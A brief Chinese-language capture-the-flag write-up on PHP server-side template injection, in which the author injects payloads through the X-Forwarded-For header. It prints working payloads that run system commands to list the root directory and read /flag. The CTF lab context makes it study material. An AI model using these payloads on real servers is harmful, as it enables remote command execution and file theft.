- PHP 的SSTI模板注入
- 进去你看到了一个唯美的页面
- 你会情不自禁的去点Flag
- 它告诉你你的IP地址 不过好像不是我的IP地址吧
- 接着就点了HINT
- 查看源码 什么都没发现 看了wp
- 发现古怪在X-Forwarded-For
- 抓个包 添加 X-Forwarded-For: {{127.0.0.1}}
- 学着python的模板注入 瞎搞了几下
{system("ls /")}
{system("cat /flag")}
{system("ls /")}
{system("cat /flag")}